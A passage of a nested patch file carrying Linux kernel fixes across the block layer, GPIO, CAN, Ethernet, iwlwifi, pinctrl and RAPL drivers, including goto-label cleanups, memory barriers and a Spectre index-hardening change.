++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,   0),
+ 	{}
+ };
+ 
+diff --git a/block/blk-core.c b/block/blk-core.c
+index a4155f123ab380..94941e3ce2194b 100644
+--- a/block/blk-core.c
++++ b/block/blk-core.c
+@@ -49,6 +49,7 @@
+ #include "blk-pm.h"
+ #include "blk-cgroup.h"
+ #include "blk-throttle.h"
++#include "blk-ioprio.h"
+ 
+ struct dentry *blk_debugfs_root;
+ 
+@@ -799,6 +800,14 @@ void submit_bio_noacct(struct bio *bio)
+ }
+ EXPORT_SYMBOL(submit_bio_noacct);
+ 
++static void bio_set_ioprio(struct bio *bio)
++{
++	/* Nobody set ioprio so far? Initialize it based on task's nice value */
++	if (IOPRIO_PRIO_CLASS(bio->bi_ioprio) == IOPRIO_CLASS_NONE)
++		bio->bi_ioprio = get_current_ioprio();
++	blkcg_set_ioprio(bio);
++}
++
+ /**
+  * submit_bio - submit a bio to the block device layer for I/O
+  * @bio: The &struct bio which describes the I/O
+@@ -824,6 +833,7 @@ void submit_bio(struct bio *bio)
+ 		count_vm_events(PGPGOUT, bio_sectors(bio));
+ 	}
+ 
++	bio_set_ioprio(bio);
+ 	submit_bio_noacct(bio);
+ }
+ EXPORT_SYMBOL(submit_bio);
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index daf0e4f3444e7c..542b28a2e6b0f1 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -42,7 +42,6 @@
+ #include "blk-stat.h"
+ #include "blk-mq-sched.h"
+ #include "blk-rq-qos.h"
+-#include "blk-ioprio.h"
+ 
+ static DEFINE_PER_CPU(struct llist_head, blk_cpu_done);
+ 
+@@ -2949,14 +2948,6 @@ static bool blk_mq_can_use_cached_rq(struct request *rq, struct blk_plug *plug,
+ 	return true;
+ }
+ 
+-static void bio_set_ioprio(struct bio *bio)
+-{
+-	/* Nobody set ioprio so far? Initialize it based on task's nice value */
+-	if (IOPRIO_PRIO_CLASS(bio->bi_ioprio) == IOPRIO_CLASS_NONE)
+-		bio->bi_ioprio = get_current_ioprio();
+-	blkcg_set_ioprio(bio);
+-}
+-
+ /**
+  * blk_mq_submit_bio - Create and send a request to block device.
+  * @bio: Bio pointer.
+@@ -2980,7 +2971,6 @@ void blk_mq_submit_bio(struct bio *bio)
+ 	blk_status_t ret;
+ 
+ 	bio = blk_queue_bounce(bio, q);
+-	bio_set_ioprio(bio);
+ 
+ 	if (plug) {
+ 		rq = rq_list_peek(&plug->cached_rq);
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index be51bd00d2fd28..55f640ef3feefd 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -1523,12 +1523,14 @@ static long linereq_set_config_unlocked(struct linereq *lr,
+ 		line = &lr->lines[i];
+ 		desc = lr->lines[i].desc;
+ 		flags = gpio_v2_line_config_flags(lc, i);
+-		gpio_v2_line_config_flags_to_desc_flags(flags, &desc->flags);
+-		edflags = flags & GPIO_V2_LINE_EDGE_DETECTOR_FLAGS;
+ 		/*
+-		 * Lines have to be requested explicitly for input
+-		 * or output, else the line will be treated "as is".
++		 * Lines not explicitly reconfigured as input or output
++		 * are left unchanged.
+ 		 */
++		if (!(flags & GPIO_V2_LINE_DIRECTION_FLAGS))
++			continue;
++		gpio_v2_line_config_flags_to_desc_flags(flags, &desc->flags);
++		edflags = flags & GPIO_V2_LINE_EDGE_DETECTOR_FLAGS;
+ 		if (flags & GPIO_V2_LINE_FLAG_OUTPUT) {
+ 			int val = gpio_v2_line_config_output_value(lc, i);
+ 
+@@ -1536,7 +1538,7 @@ static long linereq_set_config_unlocked(struct linereq *lr,
+ 			ret = gpiod_direction_output(desc, val);
+ 			if (ret)
+ 				return ret;
+-		} else if (flags & GPIO_V2_LINE_FLAG_INPUT) {
++		} else {
+ 			ret = gpiod_direction_input(desc);
+ 			if (ret)
+ 				return ret;
+diff --git a/drivers/gpio/gpiolib.c b/drivers/gpio/gpiolib.c
+index 9d8c783124033c..a0c1dabd293984 100644
+--- a/drivers/gpio/gpiolib.c
++++ b/drivers/gpio/gpiolib.c
+@@ -5,6 +5,7 @@
+ #include <linux/module.h>
+ #include <linux/interrupt.h>
+ #include <linux/irq.h>
++#include <linux/nospec.h>
+ #include <linux/spinlock.h>
+ #include <linux/list.h>
+ #include <linux/device.h>
+@@ -146,7 +147,7 @@ struct gpio_desc *gpiochip_get_desc(struct gpio_chip *gc,
+ 	if (hwnum >= gdev->ngpio)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	return &gdev->descs[hwnum];
++	return &gdev->descs[array_index_nospec(hwnum, gdev->ngpio)];
+ }
+ EXPORT_SYMBOL_GPL(gpiochip_get_desc);
+ 
+diff --git a/drivers/gpu/drm/arm/display/komeda/komeda_kms.c b/drivers/gpu/drm/arm/display/komeda/komeda_kms.c
+index 451746ebbe7138..89f3d6aa72b087 100644
+--- a/drivers/gpu/drm/arm/display/komeda/komeda_kms.c
++++ b/drivers/gpu/drm/arm/display/komeda/komeda_kms.c
+@@ -163,6 +163,7 @@ static int komeda_crtc_normalize_zpos(struct drm_crtc *crtc,
+ 	struct drm_plane *plane;
+ 	struct list_head zorder_list;
+ 	int order = 0, err;
++	u32 slave_zpos = 0;
+ 
+ 	DRM_DEBUG_ATOMIC("[CRTC:%d:%s] calculating normalized zpos values\n",
+ 			 crtc->base.id, crtc->name);
+@@ -202,10 +203,13 @@ static int komeda_crtc_normalize_zpos(struct drm_crtc *crtc,
+ 				 plane_st->zpos, plane_st->normalized_zpos);
+ 
+ 		/* calculate max slave zorder */
+-		if (has_bit(drm_plane_index(plane), kcrtc->slave_planes))
++		if (has_bit(drm_plane_index(plane), kcrtc->slave_planes)) {
++			slave_zpos = plane_st->normalized_zpos;
++			if (to_kplane_st(plane_st)->layer_split)
++				slave_zpos++;
+ 			kcrtc_st->max_slave_zorder =
+-				max(plane_st->normalized_zpos,
+-				    kcrtc_st->max_slave_zorder);
++				max(slave_zpos, kcrtc_st->max_slave_zorder);
++		}
+ 	}
+ 
+ 	crtc_st->zpos_changed = true;
+diff --git a/drivers/hwmon/asus-ec-sensors.c b/drivers/hwmon/asus-ec-sensors.c
+index b4d65916b3c000..d893cfd1cb829a 100644
+--- a/drivers/hwmon/asus-ec-sensors.c
++++ b/drivers/hwmon/asus-ec-sensors.c
+@@ -369,7 +369,7 @@ static const struct ec_board_info board_info_strix_b550_i_gaming = {
+ 
+ static const struct ec_board_info board_info_strix_x570_e_gaming = {
+ 	.sensors = SENSOR_SET_TEMP_CHIPSET_CPU_MB |
+-		SENSOR_TEMP_T_SENSOR | SENSOR_TEMP_VRM |
++		SENSOR_TEMP_T_SENSOR |
+ 		SENSOR_FAN_CHIPSET | SENSOR_CURR_CPU |
+ 		SENSOR_IN_CPU_CORE,
+ 	.mutex_path = ASUS_HW_ACCESS_MUTEX_ASMX,
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+index a9bafa96e2f926..6fecfe4cd08041 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-core.c
+@@ -744,6 +744,7 @@ static void mcp251xfd_chip_stop(struct mcp251xfd_priv *priv,
+ 
+ 	mcp251xfd_chip_interrupts_disable(priv);
+ 	mcp251xfd_chip_rx_int_disable(priv);
++	mcp251xfd_timestamp_stop(priv);
+ 	mcp251xfd_chip_sleep(priv);
+ }
+ 
+@@ -763,6 +764,8 @@ static int mcp251xfd_chip_start(struct mcp251xfd_priv *priv)
+ 	if (err)
+ 		goto out_chip_stop;
+ 
++	mcp251xfd_timestamp_start(priv);
++
+ 	err = mcp251xfd_set_bittiming(priv);
+ 	if (err)
+ 		goto out_chip_stop;
+@@ -791,7 +794,7 @@ static int mcp251xfd_chip_start(struct mcp251xfd_priv *priv)
+ 
+ 	return 0;
+ 
+- out_chip_stop:
++out_chip_stop:
+ 	mcp251xfd_dump(priv);
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+ 
+@@ -1576,7 +1579,7 @@ static irqreturn_t mcp251xfd_irq(int irq, void *dev_id)
+ 		handled = IRQ_HANDLED;
+ 	} while (1);
+ 
+- out_fail:
++out_fail:
+ 	can_rx_offload_threaded_irq_finish(&priv->offload);
+ 
+ 	netdev_err(priv->ndev, "IRQ handler returned %d (intf=0x%08x).\n",
+@@ -1610,11 +1613,12 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 	if (err)
+ 		goto out_mcp251xfd_ring_free;
+ 
++	mcp251xfd_timestamp_init(priv);
++
+ 	err = mcp251xfd_chip_start(priv);
+ 	if (err)
+ 		goto out_transceiver_disable;
+ 
+-	mcp251xfd_timestamp_init(priv);
+ 	clear_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+ 	can_rx_offload_enable(&priv->offload);
+ 
+@@ -1641,22 +1645,21 @@ static int mcp251xfd_open(struct net_device *ndev)
+ 
+ 	return 0;
+ 
+- out_free_irq:
++out_free_irq:
+ 	free_irq(spi->irq, priv);
+- out_destroy_workqueue:
++out_destroy_workqueue:
+ 	destroy_workqueue(priv->wq);
+- out_can_rx_offload_disable:
++out_can_rx_offload_disable:
+ 	can_rx_offload_disable(&priv->offload);
+ 	set_bit(MCP251XFD_FLAGS_DOWN, priv->flags);
+-	mcp251xfd_timestamp_stop(priv);
+- out_transceiver_disable:
++out_transceiver_disable:
+ 	mcp251xfd_transceiver_disable(priv);
+- out_mcp251xfd_ring_free:
++out_mcp251xfd_ring_free:
+ 	mcp251xfd_ring_free(priv);
+- out_pm_runtime_put:
++out_pm_runtime_put:
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+ 	pm_runtime_put(ndev->dev.parent);
+- out_close_candev:
++out_close_candev:
+ 	close_candev(ndev);
+ 
+ 	return err;
+@@ -1674,7 +1677,6 @@ static int mcp251xfd_stop(struct net_device *ndev)
+ 	free_irq(ndev->irq, priv);
+ 	destroy_workqueue(priv->wq);
+ 	can_rx_offload_disable(&priv->offload);
+-	mcp251xfd_timestamp_stop(priv);
+ 	mcp251xfd_chip_stop(priv, CAN_STATE_STOPPED);
+ 	mcp251xfd_transceiver_disable(priv);
+ 	mcp251xfd_ring_free(priv);
+@@ -1820,9 +1822,9 @@ mcp251xfd_register_get_dev_id(const struct mcp251xfd_priv *priv, u32 *dev_id,
+ 	*effective_speed_hz_slow = xfer[0].effective_speed_hz;
+ 	*effective_speed_hz_fast = xfer[1].effective_speed_hz;
+ 
+- out_kfree_buf_tx:
++out_kfree_buf_tx:
+ 	kfree(buf_tx);
+- out_kfree_buf_rx:
++out_kfree_buf_rx:
+ 	kfree(buf_rx);
+ 
+ 	return err;
+@@ -1936,13 +1938,13 @@ static int mcp251xfd_register(struct mcp251xfd_priv *priv)
+ 
+ 	return 0;
+ 
+- out_unregister_candev:
++out_unregister_candev:
+ 	unregister_candev(ndev);
+- out_chip_sleep:
++out_chip_sleep:
+ 	mcp251xfd_chip_sleep(priv);
+- out_runtime_disable:
++out_runtime_disable:
+ 	pm_runtime_disable(ndev->dev.parent);
+- out_runtime_put_noidle:
++out_runtime_put_noidle:
+ 	pm_runtime_put_noidle(ndev->dev.parent);
+ 	mcp251xfd_clks_and_vdd_disable(priv);
+ 
+@@ -2162,9 +2164,9 @@ static int mcp251xfd_probe(struct spi_device *spi)
+ 
+ 	return 0;
+ 
+- out_can_rx_offload_del:
++out_can_rx_offload_del:
+ 	can_rx_offload_del(&priv->offload);
+- out_free_candev:
++out_free_candev:
+ 	spi->max_speed_hz = priv->spi_max_speed_hz_orig;
+ 
+ 	free_candev(ndev);
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c
+index 004eaf96262bfd..050321345304be 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-dump.c
+@@ -94,7 +94,7 @@ static void mcp251xfd_dump_registers(const struct mcp251xfd_priv *priv,
+ 		kfree(buf);
+ 	}
+ 
+- out:
++out:
+ 	mcp251xfd_dump_header(iter, MCP251XFD_DUMP_OBJECT_TYPE_REG, reg);
+ }
+ 
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c
+index 92b7bc7f14b9eb..65150e76200720 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-regmap.c
+@@ -397,7 +397,7 @@ mcp251xfd_regmap_crc_read(void *context,
+ 
+ 		return err;
+ 	}
+- out:
++out:
+ 	memcpy(val_buf, buf_rx->data, val_len);
+ 
+ 	return 0;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+index 0fde8154a649bf..a894cb1fb9bfe1 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-ring.c
+@@ -280,7 +280,7 @@ int mcp251xfd_ring_init(struct mcp251xfd_priv *priv)
+ 	const struct mcp251xfd_rx_ring *rx_ring;
+ 	u16 base = 0, ram_used;
+ 	u8 fifo_nr = 1;
+-	int i;
++	int err = 0, i;
+ 
+ 	netdev_reset_queue(priv->ndev);
+ 
+@@ -376,10 +376,18 @@ int mcp251xfd_ring_init(struct mcp251xfd_priv *priv)
+ 		netdev_err(priv->ndev,
+ 			   "Error during ring configuration, using more RAM (%u bytes) than available (%u bytes).\n",
+ 			   ram_used, MCP251XFD_RAM_SIZE);
+-		return -ENOMEM;
++		err = -ENOMEM;
+ 	}
+ 
+-	return 0;
++	if (priv->tx_obj_num_coalesce_irq &&
++	    priv->tx_obj_num_coalesce_irq * 2 != priv->tx->obj_num) {
++		netdev_err(priv->ndev,
++			   "Error during ring configuration, number of TEF coalescing buffers (%u) must be half of TEF buffers (%u).\n",
++			   priv->tx_obj_num_coalesce_irq, priv->tx->obj_num);
++		err = -EINVAL;
++	}
++
++	return err;
+ }
+ 
+ void mcp251xfd_ring_free(struct mcp251xfd_priv *priv)
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+index 8f39730f3122ec..d4df5ccb60e3c2 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-tef.c
+@@ -219,7 +219,7 @@ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv)
+ 		total_frame_len += frame_len;
+ 	}
+ 
+- out_netif_wake_queue:
++out_netif_wake_queue:
+ 	len = i;	/* number of handled goods TEFs */
+ 	if (len) {
+ 		struct mcp251xfd_tef_ring *ring = priv->tef;
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+index 1db99aabe85c56..202ca0d24d03b9 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd-timestamp.c
+@@ -48,9 +48,12 @@ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv)
+ 	cc->shift = 1;
+ 	cc->mult = clocksource_hz2mult(priv->can.clock.freq, cc->shift);
+ 
+-	timecounter_init(&priv->tc, &priv->cc, ktime_get_real_ns());
+-
+ 	INIT_DELAYED_WORK(&priv->timestamp, mcp251xfd_timestamp_work);
++}
++
++void mcp251xfd_timestamp_start(struct mcp251xfd_priv *priv)
++{
++	timecounter_init(&priv->tc, &priv->cc, ktime_get_real_ns());
+ 	schedule_delayed_work(&priv->timestamp,
+ 			      MCP251XFD_TIMESTAMP_WORK_DELAY_SEC * HZ);
+ }
+diff --git a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+index c07300443c6a3e..0711a2f3c037aa 100644
+--- a/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
++++ b/drivers/net/can/spi/mcp251xfd/mcp251xfd.h
+@@ -939,6 +939,7 @@ int mcp251xfd_ring_alloc(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_rxif(struct mcp251xfd_priv *priv);
+ int mcp251xfd_handle_tefif(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_init(struct mcp251xfd_priv *priv);
++void mcp251xfd_timestamp_start(struct mcp251xfd_priv *priv);
+ void mcp251xfd_timestamp_stop(struct mcp251xfd_priv *priv);
+ 
+ void mcp251xfd_tx_obj_write_sync(struct work_struct *work);
+diff --git a/drivers/net/ethernet/faraday/ftgmac100.c b/drivers/net/ethernet/faraday/ftgmac100.c
+index a03879a27b0416..7adc46aa75e66c 100644
+--- a/drivers/net/ethernet/faraday/ftgmac100.c
++++ b/drivers/net/ethernet/faraday/ftgmac100.c
+@@ -566,7 +566,7 @@ static bool ftgmac100_rx_packet(struct ftgmac100 *priv, int *processed)
+ 	(*processed)++;
+ 	return true;
+ 
+- drop:
++drop:
+ 	/* Clean rxdes0 (which resets own bit) */
+ 	rxdes->rxdes0 = cpu_to_le32(status & priv->rxdes0_edorr_mask);
+ 	priv->rx_pointer = ftgmac100_next_rx_pointer(priv, pointer);
+@@ -650,6 +650,11 @@ static bool ftgmac100_tx_complete_packet(struct ftgmac100 *priv)
+ 	ftgmac100_free_tx_packet(priv, pointer, skb, txdes, ctl_stat);
+ 	txdes->txdes0 = cpu_to_le32(ctl_stat & priv->txdes0_edotr_mask);
+ 
++	/* Ensure the descriptor config is visible before setting the tx
++	 * pointer.
++	 */
++	smp_wmb();
++
+ 	priv->tx_clean_pointer = ftgmac100_next_tx_pointer(priv, pointer);
+ 
+ 	return true;
+@@ -803,6 +808,11 @@ static netdev_tx_t ftgmac100_hard_start_xmit(struct sk_buff *skb,
+ 	dma_wmb();
+ 	first->txdes0 = cpu_to_le32(f_ctl_stat);
+ 
++	/* Ensure the descriptor config is visible before setting the tx
++	 * pointer.
++	 */
++	smp_wmb();
++
+ 	/* Update next TX pointer */
+ 	priv->tx_pointer = pointer;
+ 
+@@ -823,7 +833,7 @@ static netdev_tx_t ftgmac100_hard_start_xmit(struct sk_buff *skb,
+ 
+ 	return NETDEV_TX_OK;
+ 
+- dma_err:
++dma_err:
+ 	if (net_ratelimit())
+ 		netdev_err(netdev, "map tx fragment failed\n");
+ 
+@@ -845,7 +855,7 @@ static netdev_tx_t ftgmac100_hard_start_xmit(struct sk_buff *skb,
+ 	 * last fragment, so we know ftgmac100_free_tx_packet()
+ 	 * hasn't freed the skb yet.
+ 	 */
+- drop:
++drop:
+ 	/* Drop the packet */
+ 	dev_kfree_skb_any(skb);
+ 	netdev->stats.tx_dropped++;
+@@ -1338,7 +1348,7 @@ static void ftgmac100_reset(struct ftgmac100 *priv)
+ 	ftgmac100_init_all(priv, true);
+ 
+ 	netdev_dbg(netdev, "Reset done !\n");
+- bail:
++bail:
+ 	if (priv->mii_bus)
+ 		mutex_unlock(&priv->mii_bus->mdio_lock);
+ 	if (netdev->phydev)
+@@ -1537,15 +1547,15 @@ static int ftgmac100_open(struct net_device *netdev)
+ 
+ 	return 0;
+ 
+- err_ncsi:
++err_ncsi:
+ 	napi_disable(&priv->napi);
+ 	netif_stop_queue(netdev);
+- err_alloc:
++err_alloc:
+ 	ftgmac100_free_buffers(priv);
+ 	free_irq(netdev->irq, netdev);
+- err_irq:
++err_irq:
+ 	netif_napi_del(&priv->napi);
+- err_hw:
++err_hw:
+ 	iowrite32(0, priv->base + FTGMAC100_OFFSET_IER);
+ 	ftgmac100_free_rings(priv);
+ 	return err;
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index 3b0ed1cdfa11ed..7fadaec777cea6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -3131,7 +3131,7 @@ void iwl_fw_dbg_stop_restart_recording(struct iwl_fw_runtime *fwrt,
+ {
+ 	int ret __maybe_unused = 0;
+ 
+-	if (test_bit(STATUS_FW_ERROR, &fwrt->trans->status))
++	if (!iwl_trans_fw_running(fwrt->trans))
+ 		return;
+ 
+ 	if (fw_has_capa(&fwrt->fw->ucode_capa,
+diff --git a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+index 70022cadee35b9..ad29663a356be0 100644
+--- a/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
++++ b/drivers/net/wireless/intel/iwlwifi/iwl-trans.h
+@@ -1472,8 +1472,8 @@ static inline void iwl_trans_fw_error(struct iwl_trans *trans, bool sync)
+ 
+ 	/* prevent double restarts due to the same erroneous FW */
+ 	if (!test_and_set_bit(STATUS_FW_ERROR, &trans->status)) {
+-		iwl_op_mode_nic_error(trans->op_mode, sync);
+ 		trans->state = IWL_TRANS_NO_FW;
++		iwl_op_mode_nic_error(trans->op_mode, sync);
+ 	}
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index 4e8bdd3d701bf2..bd4301857ba87f 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -4800,6 +4800,10 @@ static void iwl_mvm_flush_no_vif(struct iwl_mvm *mvm, u32 queues, bool drop)
+ 	int i;
+ 
+ 	if (!iwl_mvm_has_new_tx_api(mvm)) {
++		/* we can't ask the firmware anything if it is dead */
++		if (test_bit(IWL_MVM_STATUS_HW_RESTART_REQUESTED,
++			     &mvm->status))
++			return;
+ 		if (drop) {
+ 			mutex_lock(&mvm->mutex);
+ 			iwl_mvm_flush_tx_path(mvm,
+@@ -4881,8 +4885,11 @@ static void iwl_mvm_mac_flush(struct ieee80211_hw *hw,
+ 
+ 	/* this can take a while, and we may need/want other operations
+ 	 * to succeed while doing this, so do it without the mutex held
++	 * If the firmware is dead, this can't work...
+ 	 */
+-	if (!drop && !iwl_mvm_has_new_tx_api(mvm))
++	if (!drop && !iwl_mvm_has_new_tx_api(mvm) &&
++	    !test_bit(IWL_MVM_STATUS_HW_RESTART_REQUESTED,
++		      &mvm->status))
+ 		iwl_trans_wait_tx_queues_empty(mvm->trans, msk);
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+index 88b6d4e566c406..0a11ee347bf321 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/ops.c
+@@ -1366,6 +1366,8 @@ void iwl_mvm_stop_device(struct iwl_mvm *mvm)
+ 
+ 	clear_bit(IWL_MVM_STATUS_FIRMWARE_RUNNING, &mvm->status);
+ 
++	iwl_mvm_pause_tcm(mvm, false);
++
+ 	iwl_fw_dbg_stop_sync(&mvm->fwrt);
+ 	iwl_trans_stop_device(mvm->trans);
+ 	iwl_free_fw_paging(&mvm->fwrt);
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+index b58441c2af7302..20c5cc72e42699 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/scan.c
+@@ -824,8 +824,8 @@ static inline bool iwl_mvm_scan_fits(struct iwl_mvm *mvm, int n_ssids,
+ 	return ((n_ssids <= PROBE_OPTION_MAX) &&
+ 		(n_channels <= mvm->fw->ucode_capa.n_scan_channels) &
+ 		(ies->common_ie_len +
+-		 ies->len[NL80211_BAND_2GHZ] +
+-		 ies->len[NL80211_BAND_5GHZ] <=
++		 ies->len[NL80211_BAND_2GHZ] + ies->len[NL80211_BAND_5GHZ] +
++		 ies->len[NL80211_BAND_6GHZ] <=
+ 		 iwl_mvm_max_scan_ie_fw_cmd_room(mvm)));
+ }
+ 
+@@ -2935,18 +2935,16 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm,
+ 		params.n_channels = j;
+ 	}
+ 
+-	if (non_psc_included &&
+-	    !iwl_mvm_scan_fits(mvm, req->n_ssids, ies, params.n_channels)) {
+-		kfree(params.channels);
+-		return -ENOBUFS;
++	if (!iwl_mvm_scan_fits(mvm, req->n_ssids, ies, params.n_channels)) {
++		ret = -ENOBUFS;
++		goto out;
+ 	}
+ 
+ 	uid = iwl_mvm_build_scan_cmd(mvm, vif, &hcmd, &params, type);
+-
+-	if (non_psc_included)
+-		kfree(params.channels);
+-	if (uid < 0)
+-		return uid;
++	if (uid < 0) {
++		ret = uid;
++		goto out;
++	}
+ 
+ 	ret = iwl_mvm_send_cmd(mvm, &hcmd);
+ 	if (!ret) {
+@@ -2963,6 +2961,9 @@ int iwl_mvm_sched_scan_start(struct iwl_mvm *mvm,
+ 		mvm->sched_scan_pass_all = SCHED_SCAN_PASS_ALL_DISABLED;
+ 	}
+ 
++out:
++	if (non_psc_included)
++		kfree(params.channels);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c b/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c
+index 75fd386b048e9b..35c60faf8e8fbd 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/ctxt-info-gen3.c
+@@ -68,7 +68,8 @@ iwl_pcie_ctxt_info_dbg_enable(struct iwl_trans *trans,
+ 		}
+ 		break;
+ 	default:
+-		IWL_ERR(trans, "WRT: Invalid buffer destination\n");
++		IWL_DEBUG_FW(trans, "WRT: Invalid buffer destination (%d)\n",
++			     le32_to_cpu(fw_mon_cfg->buf_location));
+ 	}
+ out:
+ 	if (dbg_flags)
+diff --git a/drivers/pinctrl/pinctrl-at91.c b/drivers/pinctrl/pinctrl-at91.c
+index ff3b6a8a0b1707..333f9d70c7f48f 100644
+--- a/drivers/pinctrl/pinctrl-at91.c
++++ b/drivers/pinctrl/pinctrl-at91.c
+@@ -1420,8 +1420,11 @@ static int at91_pinctrl_probe(struct platform_device *pdev)
+ 
+ 	/* We will handle a range of GPIO pins */
+ 	for (i = 0; i < gpio_banks; i++)
+-		if (gpio_chips[i])
++		if (gpio_chips[i]) {
+ 			pinctrl_add_gpio_range(info->pctl, &gpio_chips[i]->range);
++			gpiochip_add_pin_range(&gpio_chips[i]->chip, dev_name(info->pctl->dev), 0,
++				gpio_chips[i]->range.pin_base, gpio_chips[i]->range.npins);
++		}
+ 
+ 	dev_info(&pdev->dev, "initialized AT91 pinctrl driver\n");
+ 
+diff --git a/drivers/powercap/intel_rapl_msr.c b/drivers/powercap/intel_rapl_msr.c
+index 65adb4cbaaf8e3..e46a7641e42f69 100644
+--- a/drivers/powercap/intel_rapl_msr.c
++++ b/drivers/powercap/intel_rapl_msr.c
+@@ -136,12 +136,12 @@ static int rapl_msr_write_raw(int cpu, struct reg_action *ra)
+ 
+ /* List of verified CPUs. */
+ static const struct x86_cpu_id pl4_support_ids[] = {
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_TIGERLAKE_L, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_ALDERLAKE, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_ALDERLAKE_L, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_ALDERLAKE_N, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_RAPTORLAKE, X86_FEATURE_ANY },
+-	{ X86_VENDOR_INTEL, 6, INTEL_FAM6_RAPTORLAKE_P, X86_FEATURE_ANY },
++	X86_MATCH_INTEL_FAM6_MODEL(TIGERLAKE_L, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_L, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(ALDERLAKE_N, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE, NULL),
++	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P, NULL),
+ 	{}
+ };
+ 
+diff --git a/drivers/scsi/lpfc/lpfc_bsg.c b/drivers/scsi/lpfc/lpfc_bsg.c
+index 2373dad016033e..fc300febe91401 100644
+--- a/drivers/scsi/lpfc/lpfc_bsg.c
++++ b/drivers/scsi/lpfc/lpfc_bsg.c
+@@ -5409,7 +5409,7 @@ lpfc_get_cgnbuf_info(struct bsg_job *job)
+ 	struct get_cgnbuf_info_req *cgnbuf_req;
+ 	struct lpfc_cgn_info *cp;
+ 	uint8_t *cgn_buff;
+-	int size, cinfosz;
++	size_t size, cinfosz;
+ 	int  rc = 0;
+ 
+ 	if (job->request_len < sizeof(struct fc_bsg_request) +
+diff --git a/drivers/spi/spi-bcm63xx.c b/drivers/spi/spi-bcm63xx.c
+index 147199002df1e6..a9921dcd6b7972 100644
+--- a/drivers/spi/spi-bcm63xx.c
++++ b/drivers/spi/spi-bcm63xx.c
